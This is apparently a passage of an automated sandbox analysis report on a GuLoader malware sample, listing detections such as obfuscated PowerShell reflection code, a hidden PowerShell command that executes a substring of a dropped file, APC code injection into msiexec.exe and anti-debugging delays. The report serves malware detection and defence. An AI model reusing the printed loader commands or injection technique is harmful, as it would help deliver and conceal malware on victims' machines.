      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeFile written: C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\Meir.iniJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: GyGE2VaBFL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: ws\System.Core.pdb source: powershell.exe, 00000001.00000002.1675183518.00000000088C4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000001.00000002.1671040347.000000000771E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.1665629538.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.1665629538.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000001.00000002.1676887865.000000000ACA8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.2415295376.0000000005518000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Found suspicious powershell code related to unpacking or dynamic code loading
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Hamper $Svesketrters $Henstilles), (Genethliacal @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Overfladebehandledes = [AppDomain]::CurrentDomain.GetAssem
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Udnvnelsernes)), $Reexcavatedlmengres).DefineDynamicModule($mindes, $false).DefineType($Hyperridiculously, $Sidonia28, [System.Multica
      Suspicious powershell command line found
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Appassionataens178=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Ricinoleic.Eks';$Desquamative=$Appassionataens178.SubString(52965,3);.$Desquamative($Appassionataens178) "
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Appassionataens178=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Ricinoleic.Eks';$Desquamative=$Appassionataens178.SubString(52965,3);.$Desquamative($Appassionataens178) "Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04A5A492 pushfd ; ret 1_2_04A5A4A1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04A5E9F8 push eax; mov dword ptr [esp], edx1_2_04A5EA0C
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\GyGE2VaBFL.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6331Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3379Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep time: -8301034833169293s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 7984Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7788Thread sleep time: -100000s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeCode function: 0_2_00406448 FindFirstFileA,FindClose,0_2_00406448
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeCode function: 0_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040589C
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: ModuleAnalysisCache.1.drBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000001.00000002.1666170853.0000000005563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\
      Source: ModuleAnalysisCache.1.drBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000001.00000002.1666170853.0000000005563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\
      Source: powershell.exe, 00000001.00000002.1666170853.0000000005563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\
      Source: svchost.exe, 00000003.00000002.2416713089.0000017F88255000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2415741764.0000017F82E2B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: ModuleAnalysisCache.1.drBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: msiexec.exe, 0000000A.00000002.2414604219.0000000000A9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeAPI call chain: ExitProcess graph end nodegraph_0-3250
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeAPI call chain: ExitProcess graph end nodegraph_0-3415
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04A57810 LdrInitializeThunk,1_2_04A57810
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Early bird code injection technique detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Writes to foreign memory regions
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3F40000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$appassionataens178=get-content -raw 'c:\users\user\appdata\local\afsindigstes\physitheism\altingsmedlemmet\ricinoleic.eks';$desquamative=$appassionataens178.substring(52965,3);.$desquamative($appassionataens178) "
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$appassionataens178=get-content -raw 'c:\users\user\appdata\local\afsindigstes\physitheism\altingsmedlemmet\ricinoleic.eks';$desquamative=$appassionataens178.substring(52965,3);.$desquamative($appassionataens178) "Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
